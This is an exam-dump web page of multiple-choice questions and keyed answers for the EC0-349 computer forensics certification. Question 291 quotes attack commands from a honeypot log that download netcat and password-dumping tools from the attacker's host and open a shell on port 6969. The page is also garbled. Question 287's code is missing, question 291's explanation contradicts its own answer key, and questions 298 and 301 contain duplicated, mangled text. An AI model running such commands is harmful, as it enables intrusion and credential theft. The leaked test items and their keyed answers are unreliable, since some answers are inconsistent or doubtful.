• Home
  • Articles
  • [Dec-2024] Updated and Accurate EC0-349 Questions & Answers for passing the exam Quickly [Q287-Q306]

[Dec-2024] Updated and Accurate EC0-349 Questions & Answers for passing the exam Quickly [Q287-Q306]

Share

[Dec-2024] Updated and Accurate EC0-349 Questions & Answers for passing the exam Quickly

Download Real EC0-349 Exam Dumps for candidates. 100% Free Dump Files

NEW QUESTION # 287
You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web pages to check for vulnerabilities:
When you type this and click on search, you receive a pop-up window that says:
"This is a test."
What is the result of this test?

  • A. Your website is vulnerable to CSS
  • B. Your website is vulnerable to SQL injection
  • C. Your website is vulnerable to web bugs
  • D. Your website is not vulnerable

Answer: A


NEW QUESTION # 288
What is cold boot (hard boot)?

  • A. It is the process of restarting a computer that is already in sleep mode
  • B. It is the process of starting a computer from a powered-down or off state
  • C. It is the process of shutting down a computer from a powered-on or on state
  • D. It is the process of restarting a computer that is already turned on through the operating system

Answer: B


NEW QUESTION # 289
A forensics investigator needs to copy data from a computer to some type of removable media so he can examine the information at another location. The problem is that the data is around 42GB in size. What type of removable media could the investigator use?

  • A. Blu-Ray dual-layer
  • B. Blu-Ray single-layer
  • C. HD-DVD
  • D. DVD-18

Answer: A


NEW QUESTION # 290
Networks are vulnerable to an attack which occurs due to overextension of bandwidth, bottlenecks, network data interception, etc.
Which of the following network attacks refers to a process in which an attacker changes his or her IP address so that he or she appears to be someone else?

  • A. Man-in-the-middle attack
  • B. Session sniffing
  • C. IP address spoofing
  • D. Denial of Service attack

Answer: C


NEW QUESTION # 291
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?

  • A. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
  • B. It is a local exploit where the attacker logs in using username johna2k
  • C. There are two attackers on the system - johna2k and haxedj00
  • D. The attack is a remote exploit and the hacker downloads three files

Answer: D

Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.


NEW QUESTION # 292
After passively scanning the network of Department of Defense (DoD), you switch over to active scanning to identify live hosts on their network. DoD is a large organization and should respond to any number of scans. You start an ICMP ping sweep by sending an IP packet to the broadcast address. Only five hosts respond to your ICMP pings; definitely not the number of hosts you were expecting. Why did this ping sweep only produce a few responses?

  • A. Only IBM AS/400 will reply to this scan
  • B. Only Unix and Unix-like systems will reply to this scan
  • C. A switched network will not respond to packets sent to the broadcast address
  • D. Only Windows systems will reply to this scan

Answer: B


NEW QUESTION # 293
Which wireless standard has bandwidth up to 54 Mbps and signals in a regulated frequency spectrum around 5 GHz?

  • A. 802.11a
  • B. 802.11g
  • C. 802.11b
  • D. 802.11i

Answer: A


NEW QUESTION # 294
Files stored in the Recycle Bin in its physical location are renamed as Dxy.ext, where, "X" represents the _________.

  • A. Sequential number
  • B. Drive name
  • C. Original file name's extension
  • D. Original file name

Answer: B


NEW QUESTION # 295
Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States?

  • A. Internet Fraud Complaint Center
  • B. Local or national office of the U.S. Secret Service
  • C. CERT Coordination Center
  • D. National Infrastructure Protection Center

Answer: B


NEW QUESTION # 296
Law enforcement officers are conducting a legal search for which a valid warrant was obtained.
While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible?

  • A. Plain view doctrine
  • B. Locard Exchange Principle
  • C. Corpus delicti
  • D. Ex Parte Order

Answer: A


NEW QUESTION # 297
Wireless access control attacks aim to penetrate a network by evading WLAN access control measures, such as AP MAC filters and Wi-Fi port access controls.
Which of the following wireless access control attacks allows the attacker to set up a rogue access point outside the corporate perimeter, and then lure the employees of the organization to connect to it?

  • A. War driving
  • B. MAC spoofing
  • C. Rogue access points
  • D. Client mis-association

Answer: D


NEW QUESTION # 298
One way to identify the presence of hidden partitions on a suspect hard drive is to:One way to identify the presence of hidden partitions on a suspect? hard drive is to:

  • A. Add up the total size of all known partitions and compare it to the total size of the hard drive
  • B. Examine the FAT and identify hidden partitions by noting an ?in the artition Type?fieldExamine the FAT and identify hidden partitions by noting an ??in the ?artition Type?field
  • C. It is not possible to have hidden partitions on a hard drive
  • D. Examine the LILO and note an ?in the artition Type?fieldExamine the LILO and note an ??in the ?artition Type?field

Answer: A


NEW QUESTION # 299
Item 2If you come across a sheepdip machine at your client site, what would you infer?

  • A. A sheepdip computer is another name for a honeypot
  • B. A sheepdip coordinates several honeypots
  • C. A sheepdip computer defers a denial of service attack
  • D. A sheepdip computer is used only for virus-checking.

Answer: D


NEW QUESTION # 300
What is the first step taken in an investigation for laboratory forensic staff members?

  • A. Securing and evaluating the electronic crime scene
  • B. Transporting the electronic evidence
  • C. Packaging the electronic evidence
  • D. Conducting preliminary interviews

Answer: A


NEW QUESTION # 301
Heather, a computer forensics investigator, is assisting a group of investigators working on a large computer fraud case involving over 20 people. These 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather responsibility is to findThese 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather? responsibility is to find out how the accused people communicated between each other. She has searched their email and their computers and has not found any useful evidence. Heather then finds some possibly useful evidence under the desk of one of the accused. In an envelope she finds a piece of plastic with numerous holes cut out of it. Heather then finds the same exact piece of plastic with holes at many of the other accused peoples?desks. Heather believes that the 20 people involved in the case were using a cipher to send secret messages in between each other. What type of cipher was used by the accused in this case?

  • A. Visual semagram
  • B. Grill cipher
  • C. Null cipher
  • D. Text semagram

Answer: B


NEW QUESTION # 302
You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case. How would you permanently erase the data on the hard disk?

  • A. Run the powerful magnets over the hard disk
  • B. Format the hard disk multiple times using a low level disk utility
  • C. Overwrite the contents of the hard disk with Junk data
  • D. Throw the hard disk into the fire

Answer: D


NEW QUESTION # 303
Deposition enables opposing counsel to preview an expert witness's testimony at trial. Which of the following deposition is not a standard practice?

  • A. No jury or judge
  • B. Opposing counsel asks questions
  • C. Both attorneys are present
  • D. Only one attorneys is present

Answer: D


NEW QUESTION # 304
Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?

  • A. Only DNS traffic can be hijacked
  • B. HTTP protocol does not maintain session
  • C. Only FTP traffic can be hijacked
  • D. Only an HTTPS session can be hijacked

Answer: B


NEW QUESTION # 305
The following is a log file screenshot from a default installation of IIS 6.0.

What time standard is used by IIS as seen in the screenshot?

  • A. UTC
  • B. TAI
  • C. UT
  • D. GMT

Answer: A


NEW QUESTION # 306
......

Prepare Important Exam with EC0-349 Exam Dumps: https://testinsides.vcedumps.com/EC0-349-examcollection.html

Related Articles

more
EC-COUNCIL EC0-349 Certification Practice Exam

VCEDumps is a joint venture for provding vce files free and valid dumps pdf. We guarantee VCEDumps dumps pdf help you pass exam 100% for sure. Not Valid, Full Refund!

Latest VCE Dumps

Useful Links

Contact Us

Our Working Time: ( GMT 0:00-15:00 )
From Monday to Saturday

Support: Contact now 

If you have any question please leave me your email address, we will reply and send email to you in 12 hours.

Copyright © 2026 VCEDumps NETWORK CO.,LIMITED. All Rights Reserved. All trademarks used are properties of their respective owners. Privacy Policy